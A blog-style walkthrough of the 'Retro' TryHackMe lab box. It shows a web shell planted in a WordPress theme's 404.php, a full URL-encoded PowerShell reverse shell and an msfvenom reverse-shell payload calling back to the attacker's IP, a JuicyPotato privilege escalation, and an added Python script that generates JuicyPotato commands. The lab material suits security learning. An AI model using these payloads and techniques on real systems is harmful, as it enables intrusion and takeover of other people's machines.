Retro on TryHackMe

Before all

Another HARD box.
A machine that took me two days to get through…
Off to work on my project in a bit owob

Victim’s IP : 10.10.233.57
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command

rustscan -a 10.10.233.57 --ulimit 5000 -- -sC -sV -Pn

Result
image
Port 80 is a web service, and port 3389 has RDP open.

directory enumeration

Here I used dirbuster, because dirsearch didn't turn up anything
image
Wordlist used: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
Result:
image
Found the path /retro, which is a WordPress site.
image
It really is pretty retro.

Exploit

social engineering

Found a strange comment left by the admin user wade:
image
Guessed it was a username/password pair; logging into the WordPress admin page as wade/parzival worked.
Also, since RDP is open, I tried xfreerdp with the same credentials (password reuse across the web app and the OS account).

rdp

Logged in successfully with the credentials just obtained.
Command

xfreerdp /u:wade /p:parzival /v:10.10.233.57 /dynamic-resolution

Result
image
RDP worked, got user.txt.

reverse shell

Since I have WordPress admin rights, I injected a web shell into the theme's 404.php (it lives under wp-content/themes/90s-retro/, as the URL below shows).
image
Once it was in place, I passed it a PowerShell payload generated by reverseshell.com (link here) through the shark parameter:
url:http://10.10.233.57/retro/wp-content/themes/90s-retro/404.php?shark=powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20"%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient('10.9.195.189'%2C%205427)%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream()%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter(%24NetworkStream)%3Bfunction%20WriteToStream%20(%24String)%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%%20%7B0%7D%3B%24StreamWriter.Write(%24String%20%2B%20'SHELL>%20')%3B%24StreamWriter.Flush()%7DWriteToStream%20''%3Bwhile((%24BytesRead%20%3D%20%24NetworkStream.Read(%24Buffer%2C%200%2C%20%24Buffer.Length))%20-gt%200)%20%7B%24Command%20%3D%20(%5Btext.encoding%5D%3A%3AUTF8).GetString(%24Buffer%2C%200%2C%20%24BytesRead%20-%201)%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202>%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20(%24Output)%7D%24StreamWriter.Close()"
GET SHELL!!!
image

Privilege Escalation

Run whoami /priv to check the privileges held by the current user

image
SeImpersonatePrivilege is enabled, so it is reasonable to assume the privilege escalation tool Juicy Potato (which abuses SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to get a SYSTEM token) will work for the next step.
Note: https://github.com/ohpe/juicy-potato/releases/tag/v0.1
Use msfvenom to generate an exe reverse shell
Command

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.9.195.189 lport=1004 -f exe -o ./x64winreverse.exe

Through the reverse shell obtained earlier, upload JuicyPotato.exe and x64winreverse.exe to the machine.
Then look up CLSIDs that match the OS version (check it with systeminfo) and try them one by one. Note that -l is JuicyPotato's local COM listen port on the victim, not the reverse shell port; it only happens to be 1004 here as well.
(CLSID table: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard)
Command

./JuicyPotato.exe -t * -l 1004  -p x64winreverse.exe -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"

Result
image
Got a callback on the listening port!!!
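As an added example (not part of the original write-up), the privilege check and the CLSID loop above can be scripted so the triage is repeatable: parse whoami /priv output, report which potato-relevant privileges the token holds, and emit one JuicyPotato command per CLSID to paste into the low-privilege shell. The whoami /priv text below is constructed, not captured from this box; the flag layout follows JuicyPotato's own usage (-t, -l, -p, -c), and the CLSID is the one the write-up used.

```python
import re

# Constructed sample of `whoami /priv` output (not captured from the target).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Either of these in the token is what the potato family needs.
POTATO_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Name and State are the first and last column; Description may contain spaces.
_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled', skipping headers and rulers."""
    privs = {}
    for line in text.splitlines():
        m = _PRIV_LINE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def potato_candidates(privs: dict[str, str]) -> dict[str, str]:
    """Potato-relevant privileges present in the token, with their state.

    A privilege that is present but Disabled is still worth reporting: it is in the
    token, so the process can enable it itself; only absence rules the technique out.
    """
    return {p: privs[p] for p in POTATO_PRIVS if p in privs}


def juicy_commands(clsids: list[str], payload_exe: str, listen_port: int = 1004) -> list[str]:
    """One JuicyPotato invocation per CLSID, for trying them one by one.

    -t * tries both CreateProcessWithTokenW and CreateProcessAsUser; -l is the local
    COM listen port on the victim (unrelated to the reverse shell's port).
    """
    return [
        f'JuicyPotato.exe -t * -l {listen_port} -p {payload_exe} -c "{clsid}"'
        for clsid in clsids
    ]


if __name__ == "__main__":
    found = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    print("potato-relevant privileges:", potato_candidates(found))
    # CLSID from the write-up; in practice load the whole list for the matching OS build.
    for cmd in juicy_commands(["{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"], "x64winreverse.exe"):
        print(cmd)
```

Start the listener for the msfvenom payload before running any of the generated commands; the first CLSID that yields a callback is the one to keep.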

After all

First time playing with JuicyPotato, fun XD